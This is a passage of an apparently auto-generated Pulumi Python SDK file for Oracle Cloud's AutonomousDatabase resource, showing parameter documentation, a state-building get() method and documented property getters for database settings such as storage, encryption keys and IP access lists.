:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AutonomousDatabaseCustomerContactArgs']]]] customer_contacts: (Updatable) Customer Contacts.
:param pulumi.Input[str] data_safe_status: (Updatable) Status of the Data Safe registration for this Autonomous Database. Could be REGISTERED or NOT_REGISTERED.
:param pulumi.Input[int] data_storage_size_in_gb: (Updatable) The size, in gigabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. The maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
:param pulumi.Input[int] data_storage_size_in_tbs: (Updatable) The size, in terabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. For Autonomous Databases on dedicated Exadata infrastructure, the maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
:param pulumi.Input[str] db_name: The database name. The name must begin with an alphabetic character and can contain a maximum of 14 alphanumeric characters. Special characters are not permitted. The database name must be unique in the tenancy.
:param pulumi.Input[str] db_version: (Updatable) A valid Oracle Database version for Autonomous Database.`db_workload` AJD and APEX are only supported for `db_version` `19c` and above.
:param pulumi.Input[str] db_workload: (Updatable) The Autonomous Database workload type. The following values are valid:
* OLTP - indicates an Autonomous Transaction Processing database
* DW - indicates an Autonomous Data Warehouse database
* AJD - indicates an Autonomous JSON Database
* APEX - indicates an Autonomous Database with the Oracle APEX Application Development workload type. *Note: `db_workload` can only be updated from AJD to OLTP or from a free OLTP to AJD.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
:param pulumi.Input[str] display_name: (Updatable) The user-friendly name for the Autonomous Database. The name does not have to be unique.
:param pulumi.Input[int] failed_data_recovery_in_seconds: Indicates the number of seconds of data loss for a Data Guard failover.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
:param pulumi.Input[str] infrastructure_type: The infrastructure type this resource belongs to.
:param pulumi.Input[bool] is_access_control_enabled: (Updatable) Indicates if the database-level access control is enabled. If disabled, database access is defined by the network security rules. If enabled, database access is restricted to the IP addresses defined by the rules specified with the `whitelistedIps` property. While specifying `whitelistedIps` rules is optional, if database-level access control is enabled and no rules are specified, the database will become inaccessible. The rules can be added later using the `UpdateAutonomousDatabase` API operation or edit option in console. When creating a database clone, the desired access control setting should be specified. By default, database-level access control will be disabled for the clone.
:param pulumi.Input[bool] is_auto_scaling_enabled: (Updatable) Indicates if auto scaling is enabled for the Autonomous Database OCPU core count. The default value is `FALSE`.
:param pulumi.Input[bool] is_data_guard_enabled: (Updatable) Indicates whether the Autonomous Database has Data Guard enabled.
:param pulumi.Input[bool] is_dedicated: True if the database is on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm).
:param pulumi.Input[bool] is_free_tier: (Updatable) Indicates if this is an Always Free resource. The default value is false. Note that Always Free Autonomous Databases have 1 CPU and 20GB of memory. For Always Free databases, memory and CPU cannot be scaled. When `db_workload` is `AJD` or `APEX` it cannot be `true`.
:param pulumi.Input[bool] is_preview: Indicates if the Autonomous Database version is a preview version.
:param pulumi.Input[bool] is_preview_version_with_service_terms_accepted: If set to `TRUE`, indicates that an Autonomous Database preview version is being provisioned, and that the preview version's terms of service have been accepted. Note that preview version software is only available for databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI).
:param pulumi.Input[bool] is_refreshable_clone: (Updatable) True for creating a refreshable clone and False for detaching the clone from source Autonomous Database. Detaching is one time operation and clone becomes a regular Autonomous Database.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['AutonomousDatabaseKeyHistoryEntryArgs']]]] key_history_entries: Key History Entry.
:param pulumi.Input[str] key_store_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the key store.
:param pulumi.Input[str] key_store_wallet_name: The wallet name for Oracle Key Vault.
:param pulumi.Input[str] kms_key_id: The OCID of the key container that is used as the master encryption key in database transparent data encryption (TDE) operations.
:param pulumi.Input[str] kms_key_lifecycle_details: KMS key lifecycle details.
:param pulumi.Input[str] license_model: (Updatable) The Oracle license model that applies to the Oracle Autonomous Database. Bring your own license (BYOL) allows you to apply your current on-premises Oracle software licenses to equivalent, highly automated Oracle PaaS and IaaS services in the cloud. License Included allows you to subscribe to new Oracle Database software licenses and the Database service. Note that when provisioning an Autonomous Database on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm), this attribute must be null because the attribute is already set at the Autonomous Exadata Infrastructure level. When using [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI), if a value is not specified, the system will supply the value of `BRING_YOUR_OWN_LICENSE`. It is a required field when `db_workload` is AJD and needs to be set to `LICENSE_INCLUDED` as AJD does not support default `license_model` value `BRING_YOUR_OWN_LICENSE`.
:param pulumi.Input[str] lifecycle_details: Additional information about the current lifecycle state.
:param pulumi.Input[Sequence[pulumi.Input[str]]] nsg_ids: (Updatable) A list of the [OCIDs](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the network security groups (NSGs) that this resource belongs to. Setting this to an empty array after the list is created removes the resource from all NSGs. For more information about NSGs, see [Security Rules](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/securityrules.htm). **NsgIds restrictions:**
* Autonomous Databases with private access require at least 1 Network Security Group (NSG). The nsgIds array cannot be empty.
:param pulumi.Input[float] ocpu_count: (Updatable) The number of OCPU cores to be made available to the database.
:param pulumi.Input[str] open_mode: The `DATABASE OPEN` mode. You can open the database in `READ_ONLY` or `READ_WRITE` mode.
:param pulumi.Input[str] operations_insights_status: Status of Operations Insights for this Autonomous Database.
:param pulumi.Input[str] permission_level: The Autonomous Database permission level. Restricted mode allows access only to admin users.
:param pulumi.Input[str] private_endpoint: The private endpoint for the resource.
:param pulumi.Input[str] private_endpoint_ip: The private endpoint Ip address for the resource.
:param pulumi.Input[str] private_endpoint_label: (Updatable) The private endpoint label for the resource.
:param pulumi.Input[str] refreshable_mode: (Updatable) The refresh mode of the clone. AUTOMATIC indicates that the clone is automatically being refreshed with data from the source Autonomous Database.
:param pulumi.Input[str] refreshable_status: The refresh status of the clone. REFRESHING indicates that the clone is currently being refreshed with data from the source Autonomous Database.
:param pulumi.Input[str] role: The Data Guard role of the Autonomous Container Database, if Autonomous Data Guard is enabled.
:param pulumi.Input[bool] rotate_key_trigger: (Updatable) An optional property when flipped triggers rotation of KMS key. It is only applicable on dedicated databases i.e. where `is_dedicated` is true.
:param pulumi.Input[str] service_console_url: The URL of the Service Console for the Autonomous Database.
:param pulumi.Input[str] source: The source of the database: Use `NONE` for creating a new Autonomous Database. Use `DATABASE` for creating a new Autonomous Database by cloning an existing Autonomous Database.
:param pulumi.Input[str] source_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
:param pulumi.Input[pulumi.InputType['AutonomousDatabaseStandbyDbArgs']] standby_db: Autonomous Data Guard standby database details.
:param pulumi.Input[Sequence[pulumi.Input[str]]] standby_whitelisted_ips: (Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
:param pulumi.Input[str] state: (Updatable) The current state of the Autonomous Database. Could be set to AVAILABLE or STOPPED
:param pulumi.Input[str] subnet_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the subnet the resource is associated with.
:param pulumi.Input[str] switchover_to: It is applicable only when `is_data_guard_enabled` is true. Could be set to `PRIMARY` or `STANDBY`. Default value is `PRIMARY`.
:param pulumi.Input[Mapping[str, Any]] system_tags: System tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
:param pulumi.Input[str] time_created: The date and time the Autonomous Database was created.
:param pulumi.Input[str] time_deletion_of_free_autonomous_database: The date and time the Always Free database will be automatically deleted because of inactivity. If the database is in the STOPPED state and without activity until this time, it will be deleted.
:param pulumi.Input[str] time_maintenance_begin: The date and time when maintenance will begin.
:param pulumi.Input[str] time_maintenance_end: The date and time when maintenance will end.
:param pulumi.Input[str] time_of_last_failover: The timestamp of the last failover operation.
:param pulumi.Input[str] time_of_last_refresh: The date and time when last refresh happened.
:param pulumi.Input[str] time_of_last_refresh_point: The refresh point timestamp (UTC). The refresh point is the time to which the database was most recently refreshed. Data created after the refresh point is not included in the refresh.
:param pulumi.Input[str] time_of_last_switchover: The timestamp of the last switchover operation for the Autonomous Database.
:param pulumi.Input[str] time_of_next_refresh: The date and time of next refresh.
:param pulumi.Input[str] time_reclamation_of_free_autonomous_database: The date and time the Always Free database will be stopped because of inactivity. If this time is reached without any database activity, the database will automatically be put into the STOPPED state.
:param pulumi.Input[str] timestamp: The timestamp specified for the point-in-time clone of the source Autonomous Database. The timestamp must be in the past.
:param pulumi.Input[int] used_data_storage_size_in_tbs: The amount of storage that has been used, in terabytes.
:param pulumi.Input[str] vault_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the Oracle Cloud Infrastructure [vault](https://docs.cloud.oracle.com/iaas/Content/KeyManagement/Concepts/keyoverview.htm#concepts).
:param pulumi.Input[Sequence[pulumi.Input[str]]] whitelisted_ips: (Updatable) The client IP access control list (ACL). This feature is available for autonomous databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI) and on Exadata Cloud@Customer. Only clients connecting from an IP address included in the ACL may access the Autonomous Database instance.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _AutonomousDatabaseState.__new__(_AutonomousDatabaseState)
__props__.__dict__["admin_password"] = admin_password
__props__.__dict__["apex_details"] = apex_details
__props__.__dict__["are_primary_whitelisted_ips_used"] = are_primary_whitelisted_ips_used
__props__.__dict__["autonomous_container_database_id"] = autonomous_container_database_id
__props__.__dict__["autonomous_database_backup_id"] = autonomous_database_backup_id
__props__.__dict__["autonomous_database_id"] = autonomous_database_id
__props__.__dict__["autonomous_maintenance_schedule_type"] = autonomous_maintenance_schedule_type
__props__.__dict__["available_upgrade_versions"] = available_upgrade_versions
__props__.__dict__["backup_config"] = backup_config
__props__.__dict__["clone_type"] = clone_type
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["connection_strings"] = connection_strings
__props__.__dict__["connection_urls"] = connection_urls
__props__.__dict__["cpu_core_count"] = cpu_core_count
__props__.__dict__["customer_contacts"] = customer_contacts
__props__.__dict__["data_safe_status"] = data_safe_status
__props__.__dict__["data_storage_size_in_gb"] = data_storage_size_in_gb
__props__.__dict__["data_storage_size_in_tbs"] = data_storage_size_in_tbs
__props__.__dict__["db_name"] = db_name
__props__.__dict__["db_version"] = db_version
__props__.__dict__["db_workload"] = db_workload
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["display_name"] = display_name
__props__.__dict__["failed_data_recovery_in_seconds"] = failed_data_recovery_in_seconds
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["infrastructure_type"] = infrastructure_type
__props__.__dict__["is_access_control_enabled"] = is_access_control_enabled
__props__.__dict__["is_auto_scaling_enabled"] = is_auto_scaling_enabled
__props__.__dict__["is_data_guard_enabled"] = is_data_guard_enabled
__props__.__dict__["is_dedicated"] = is_dedicated
__props__.__dict__["is_free_tier"] = is_free_tier
__props__.__dict__["is_preview"] = is_preview
__props__.__dict__["is_preview_version_with_service_terms_accepted"] = is_preview_version_with_service_terms_accepted
__props__.__dict__["is_refreshable_clone"] = is_refreshable_clone
__props__.__dict__["key_history_entries"] = key_history_entries
__props__.__dict__["key_store_id"] = key_store_id
__props__.__dict__["key_store_wallet_name"] = key_store_wallet_name
__props__.__dict__["kms_key_id"] = kms_key_id
__props__.__dict__["kms_key_lifecycle_details"] = kms_key_lifecycle_details
__props__.__dict__["license_model"] = license_model
__props__.__dict__["lifecycle_details"] = lifecycle_details
__props__.__dict__["nsg_ids"] = nsg_ids
__props__.__dict__["ocpu_count"] = ocpu_count
__props__.__dict__["open_mode"] = open_mode
__props__.__dict__["operations_insights_status"] = operations_insights_status
__props__.__dict__["permission_level"] = permission_level
__props__.__dict__["private_endpoint"] = private_endpoint
__props__.__dict__["private_endpoint_ip"] = private_endpoint_ip
__props__.__dict__["private_endpoint_label"] = private_endpoint_label
__props__.__dict__["refreshable_mode"] = refreshable_mode
__props__.__dict__["refreshable_status"] = refreshable_status
__props__.__dict__["role"] = role
__props__.__dict__["rotate_key_trigger"] = rotate_key_trigger
__props__.__dict__["service_console_url"] = service_console_url
__props__.__dict__["source"] = source
__props__.__dict__["source_id"] = source_id
__props__.__dict__["standby_db"] = standby_db
__props__.__dict__["standby_whitelisted_ips"] = standby_whitelisted_ips
__props__.__dict__["state"] = state
__props__.__dict__["subnet_id"] = subnet_id
__props__.__dict__["switchover_to"] = switchover_to
__props__.__dict__["system_tags"] = system_tags
__props__.__dict__["time_created"] = time_created
__props__.__dict__["time_deletion_of_free_autonomous_database"] = time_deletion_of_free_autonomous_database
__props__.__dict__["time_maintenance_begin"] = time_maintenance_begin
__props__.__dict__["time_maintenance_end"] = time_maintenance_end
__props__.__dict__["time_of_last_failover"] = time_of_last_failover
__props__.__dict__["time_of_last_refresh"] = time_of_last_refresh
__props__.__dict__["time_of_last_refresh_point"] = time_of_last_refresh_point
__props__.__dict__["time_of_last_switchover"] = time_of_last_switchover
__props__.__dict__["time_of_next_refresh"] = time_of_next_refresh
__props__.__dict__["time_reclamation_of_free_autonomous_database"] = time_reclamation_of_free_autonomous_database
__props__.__dict__["timestamp"] = timestamp
__props__.__dict__["used_data_storage_size_in_tbs"] = used_data_storage_size_in_tbs
__props__.__dict__["vault_id"] = vault_id
__props__.__dict__["whitelisted_ips"] = whitelisted_ips
return AutonomousDatabase(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="adminPassword")
def admin_password(self) -> pulumi.Output[str]:
"""
(Updatable) The password must be between 12 and 30 characters long, and must contain at least 1 uppercase, 1 lowercase, and 1 numeric character. It cannot contain the double quote symbol (") or the username "admin", regardless of casing. The password is mandatory if source value is "BACKUP_FROM_ID", "BACKUP_FROM_TIMESTAMP", "DATABASE" or "NONE".
"""
return pulumi.get(self, "admin_password")
@property
@pulumi.getter(name="apexDetails")
def apex_details(self) -> pulumi.Output['outputs.AutonomousDatabaseApexDetails']:
"""
Information about Oracle APEX Application Development.
"""
return pulumi.get(self, "apex_details")
@property
@pulumi.getter(name="arePrimaryWhitelistedIpsUsed")
def are_primary_whitelisted_ips_used(self) -> pulumi.Output[bool]:
"""
(Updatable) This field will be null if the Autonomous Database is not Data Guard enabled or Access Control is disabled. It's value would be `TRUE` if Autonomous Database is Data Guard enabled and Access Control is enabled and if the Autonomous Database uses primary IP access control list (ACL) for standby. It's value would be `FALSE` if Autonomous Database is Data Guard enabled and Access Control is enabled and if the Autonomous Database uses different IP access control list (ACL) for standby compared to primary.
"""
return pulumi.get(self, "are_primary_whitelisted_ips_used")
@property
@pulumi.getter(name="autonomousContainerDatabaseId")
def autonomous_container_database_id(self) -> pulumi.Output[str]:
"""
The Autonomous Container Database [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).
"""
return pulumi.get(self, "autonomous_container_database_id")
@property
@pulumi.getter(name="autonomousDatabaseBackupId")
def autonomous_database_backup_id(self) -> pulumi.Output[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database Backup that you will clone to create a new Autonomous Database.
"""
return pulumi.get(self, "autonomous_database_backup_id")
@property
@pulumi.getter(name="autonomousDatabaseId")
def autonomous_database_id(self) -> pulumi.Output[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the source Autonomous Database that you will clone to create a new Autonomous Database.
"""
return pulumi.get(self, "autonomous_database_id")
@property
@pulumi.getter(name="autonomousMaintenanceScheduleType")
def autonomous_maintenance_schedule_type(self) -> pulumi.Output[str]:
"""
The maintenance schedule type of the Autonomous Database on shared Exadata infrastructure. The EARLY maintenance schedule of this Autonomous Database follows a schedule that applies patches prior to the REGULAR schedule.The REGULAR maintenance schedule of this Autonomous Database follows the normal cycle.
"""
return pulumi.get(self, "autonomous_maintenance_schedule_type")
@property
@pulumi.getter(name="availableUpgradeVersions")
def available_upgrade_versions(self) -> pulumi.Output[Sequence[str]]:
"""
List of Oracle Database versions available for a database upgrade. If there are no version upgrades available, this list is empty.
"""
return pulumi.get(self, "available_upgrade_versions")
@property
@pulumi.getter(name="backupConfig")
def backup_config(self) -> pulumi.Output['outputs.AutonomousDatabaseBackupConfig']:
"""
Autonomous Database configuration details for storing [manual backups](https://docs.cloud.oracle.com/iaas/Content/Database/Tasks/adbbackingup.htm) in the [Object Storage](https://docs.cloud.oracle.com/iaas/Content/Object/Concepts/objectstorageoverview.htm) service.
"""
return pulumi.get(self, "backup_config")
@property
@pulumi.getter(name="cloneType")
def clone_type(self) -> pulumi.Output[str]:
"""
The Autonomous Database clone type.
"""
return pulumi.get(self, "clone_type")
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Output[str]:
"""
(Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment of the Autonomous Database.
"""
return pulumi.get(self, "compartment_id")
@property
@pulumi.getter(name="connectionStrings")
def connection_strings(self) -> pulumi.Output['outputs.AutonomousDatabaseConnectionStrings']:
"""
The connection string used to connect to the Autonomous Database. The username for the Service Console is ADMIN. Use the password you entered when creating the Autonomous Database for the password value.
"""
return pulumi.get(self, "connection_strings")
@property
@pulumi.getter(name="connectionUrls")
def connection_urls(self) -> pulumi.Output['outputs.AutonomousDatabaseConnectionUrls']:
"""
The URLs for accessing Oracle Application Express (APEX) and SQL Developer Web with a browser from a Compute instance within your VCN or that has a direct connection to your VCN. Note that these URLs are provided by the console only for databases on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm). Example: `{"sqlDevWebUrl": "https://<hostname>/ords...", "apexUrl", "https://<hostname>/ords..."}`
"""
return pulumi.get(self, "connection_urls")
@property
@pulumi.getter(name="cpuCoreCount")
def cpu_core_count(self) -> pulumi.Output[int]:
"""
(Updatable) The number of OCPU cores to be made available to the database. For Autonomous Databases on dedicated Exadata infrastructure, the maximum number of cores is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
"""
return pulumi.get(self, "cpu_core_count")
@property
@pulumi.getter(name="customerContacts")
def customer_contacts(self) -> pulumi.Output[Sequence['outputs.AutonomousDatabaseCustomerContact']]:
"""
(Updatable) Customer Contacts.
"""
return pulumi.get(self, "customer_contacts")
@property
@pulumi.getter(name="dataSafeStatus")
def data_safe_status(self) -> pulumi.Output[str]:
"""
(Updatable) Status of the Data Safe registration for this Autonomous Database. Could be REGISTERED or NOT_REGISTERED.
"""
return pulumi.get(self, "data_safe_status")
@property
@pulumi.getter(name="dataStorageSizeInGb")
def data_storage_size_in_gb(self) -> pulumi.Output[int]:
"""
(Updatable) The size, in gigabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. The maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
"""
return pulumi.get(self, "data_storage_size_in_gb")
@property
@pulumi.getter(name="dataStorageSizeInTbs")
def data_storage_size_in_tbs(self) -> pulumi.Output[int]:
"""
(Updatable) The size, in terabytes, of the data volume that will be created and attached to the database. This storage can later be scaled up if needed. For Autonomous Databases on dedicated Exadata infrastructure, the maximum storage value is determined by the infrastructure shape. See [Characteristics of Infrastructure Shapes](https://www.oracle.com/pls/topic/lookup?ctx=en/cloud/paas/autonomous-database&id=ATPFG-GUID-B0F033C1-CC5A-42F0-B2E7-3CECFEDA1FD1) for shape details.
"""
return pulumi.get(self, "data_storage_size_in_tbs")
@property
@pulumi.getter(name="dbName")
def db_name(self) -> pulumi.Output[str]:
"""
The database name. The name must begin with an alphabetic character and can contain a maximum of 14 alphanumeric characters. Special characters are not permitted. The database name must be unique in the tenancy.
"""
return pulumi.get(self, "db_name")
@property
@pulumi.getter(name="dbVersion")
def db_version(self) -> pulumi.Output[str]:
"""
(Updatable) A valid Oracle Database version for Autonomous Database.`db_workload` AJD and APEX are only supported for `db_version` `19c` and above.
"""
return pulumi.get(self, "db_version")
@property
@pulumi.getter(name="dbWorkload")
def db_workload(self) -> pulumi.Output[str]:
"""
(Updatable) The Autonomous Database workload type. The following values are valid:
* OLTP - indicates an Autonomous Transaction Processing database
* DW - indicates an Autonomous Data Warehouse database
* AJD - indicates an Autonomous JSON Database
* APEX - indicates an Autonomous Database with the Oracle APEX Application Development workload type. *Note: `db_workload` can only be updated from AJD to OLTP or from a free OLTP to AJD.
"""
return pulumi.get(self, "db_workload")
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm).
"""
return pulumi.get(self, "defined_tags")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
(Updatable) The user-friendly name for the Autonomous Database. The name does not have to be unique.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="failedDataRecoveryInSeconds")
def failed_data_recovery_in_seconds(self) -> pulumi.Output[int]:
"""
Indicates the number of seconds of data loss for a Data Guard failover.
"""
return pulumi.get(self, "failed_data_recovery_in_seconds")
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@property
@pulumi.getter(name="infrastructureType")
def infrastructure_type(self) -> pulumi.Output[str]:
"""
The infrastructure type this resource belongs to.
"""
return pulumi.get(self, "infrastructure_type")
@property
@pulumi.getter(name="isAccessControlEnabled")
def is_access_control_enabled(self) -> pulumi.Output[bool]:
"""
(Updatable) Indicates if the database-level access control is enabled. If disabled, database access is defined by the network security rules. If enabled, database access is restricted to the IP addresses defined by the rules specified with the `whitelistedIps` property. While specifying `whitelistedIps` rules is optional, if database-level access control is enabled and no rules are specified, the database will become inaccessible. The rules can be added later using the `UpdateAutonomousDatabase` API operation or edit option in console. When creating a database clone, the desired access control setting should be specified. By default, database-level access control will be disabled for the clone.
"""
return pulumi.get(self, "is_access_control_enabled")
@property
@pulumi.getter(name="isAutoScalingEnabled")
def is_auto_scaling_enabled(self) -> pulumi.Output[bool]:
"""
(Updatable) Indicates if auto scaling is enabled for the Autonomous Database OCPU core count. The default value is `FALSE`.
"""
return pulumi.get(self, "is_auto_scaling_enabled")
@property
@pulumi.getter(name="isDataGuardEnabled")
def is_data_guard_enabled(self) -> pulumi.Output[bool]:
"""
(Updatable) Indicates whether the Autonomous Database has Data Guard enabled.
"""
return pulumi.get(self, "is_data_guard_enabled")
@property
@pulumi.getter(name="isDedicated")
def is_dedicated(self) -> pulumi.Output[bool]:
"""
True if the database is on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm).
"""
return pulumi.get(self, "is_dedicated")
@property
@pulumi.getter(name="isFreeTier")
def is_free_tier(self) -> pulumi.Output[bool]:
"""
(Updatable) Indicates if this is an Always Free resource. The default value is false. Note that Always Free Autonomous Databases have 1 CPU and 20GB of memory. For Always Free databases, memory and CPU cannot be scaled. When `db_workload` is `AJD` or `APEX` it cannot be `true`.
"""
return pulumi.get(self, "is_free_tier")
@property
@pulumi.getter(name="isPreview")
def is_preview(self) -> pulumi.Output[bool]:
"""
Indicates if the Autonomous Database version is a preview version.
"""
return pulumi.get(self, "is_preview")
@property
@pulumi.getter(name="isPreviewVersionWithServiceTermsAccepted")
def is_preview_version_with_service_terms_accepted(self) -> pulumi.Output[bool]:
"""
If set to `TRUE`, indicates that an Autonomous Database preview version is being provisioned, and that the preview version's terms of service have been accepted. Note that preview version software is only available for databases on [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI).
"""
return pulumi.get(self, "is_preview_version_with_service_terms_accepted")
@property
@pulumi.getter(name="isRefreshableClone")
def is_refreshable_clone(self) -> pulumi.Output[bool]:
"""
(Updatable) True for creating a refreshable clone and False for detaching the clone from source Autonomous Database. Detaching is one time operation and clone becomes a regular Autonomous Database.
"""
return pulumi.get(self, "is_refreshable_clone")
@property
@pulumi.getter(name="keyHistoryEntries")
def key_history_entries(self) -> pulumi.Output[Sequence['outputs.AutonomousDatabaseKeyHistoryEntry']]:
"""
Key History Entry.
"""
return pulumi.get(self, "key_history_entries")
@property
@pulumi.getter(name="keyStoreId")
def key_store_id(self) -> pulumi.Output[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the key store.
"""
return pulumi.get(self, "key_store_id")
@property
@pulumi.getter(name="keyStoreWalletName")
def key_store_wallet_name(self) -> pulumi.Output[str]:
"""
The wallet name for Oracle Key Vault.
"""
return pulumi.get(self, "key_store_wallet_name")
@property
@pulumi.getter(name="kmsKeyId")
def kms_key_id(self) -> pulumi.Output[str]:
"""
The OCID of the key container that is used as the master encryption key in database transparent data encryption (TDE) operations.
"""
return pulumi.get(self, "kms_key_id")
@property
@pulumi.getter(name="kmsKeyLifecycleDetails")
def kms_key_lifecycle_details(self) -> pulumi.Output[str]:
"""
KMS key lifecycle details.
"""
return pulumi.get(self, "kms_key_lifecycle_details")
@property
@pulumi.getter(name="licenseModel")
def license_model(self) -> pulumi.Output[str]:
"""
(Updatable) The Oracle license model that applies to the Oracle Autonomous Database. Bring your own license (BYOL) allows you to apply your current on-premises Oracle software licenses to equivalent, highly automated Oracle PaaS and IaaS services in the cloud. License Included allows you to subscribe to new Oracle Database software licenses and the Database service. Note that when provisioning an Autonomous Database on [dedicated Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adbddoverview.htm), this attribute must be null because the attribute is already set at the Autonomous Exadata Infrastructure level. When using [shared Exadata infrastructure](https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/adboverview.htm#AEI), if a value is not specified, the system will supply the value of `BRING_YOUR_OWN_LICENSE`. It is a required field when `db_workload` is AJD and needs to be set to `LICENSE_INCLUDED` as AJD does not support default `license_model` value `BRING_YOUR_OWN_LICENSE`.
"""
return pulumi.get(self, "license_model")
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> pulumi.Output[str]:
"""
Additional information about the current lifecycle state.
"""
return pulumi.get(self, "lifecycle_details")
@property
@pulumi.getter(name="nsgIds")
def nsg_ids(self) -> pulumi.Output[Sequence[str]]:
"""
(Updatable) A list of the [OCIDs](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the network security groups (NSGs) that this resource belongs to. Setting this to an empty array after the list is created removes the resource from all NSGs. For more information about NSGs, see [Security Rules](https://docs.cloud.oracle.com/iaas/Content/Network/Concepts/securityrules.htm). **NsgIds restrictions:**
* Autonomous Databases with private access require at least 1 Network Security Group (NSG). The nsgIds array cannot be empty.
"""
return pulumi.get(self, "nsg_ids")
@property
@pulumi.getter(name="ocpuCount")
def ocpu_count(self) -> pulumi.Output[float]:
"""
(Updatable) The number of OCPU cores to be made available to the database.
"""
return pulumi.get(self, "ocpu_count")
@property
@pulumi.getter(name="openMode")
def open_mode(self) -> pulumi.Output[str]:
"""
The `DATABASE OPEN` mode. You can open the database in `READ_ONLY` or `READ_WRITE` mode.
"""
return pulumi.get(self, "open_mode")
@property
@pulumi.getter(name="operationsInsightsStatus")
def operations_insights_status(self) -> pulumi.Output[str]:
"""
Status of Operations Insights for this Autonomous Database.
"""
return pulumi.get(self, "operations_insights_status")
@property
@pulumi.getter(name="permissionLevel")
def permission_level(self) -> pulumi.Output[str]:
"""
The Autonomous Database permission level. Restricted mode allows access only to admin users.
"""
return pulumi.get(self, "permission_level")
@property
@pulumi.getter(name="privateEndpoint")
def private_endpoint(self) -> pulumi.Output[str]:
"""
The private endpoint for the resource.
"""
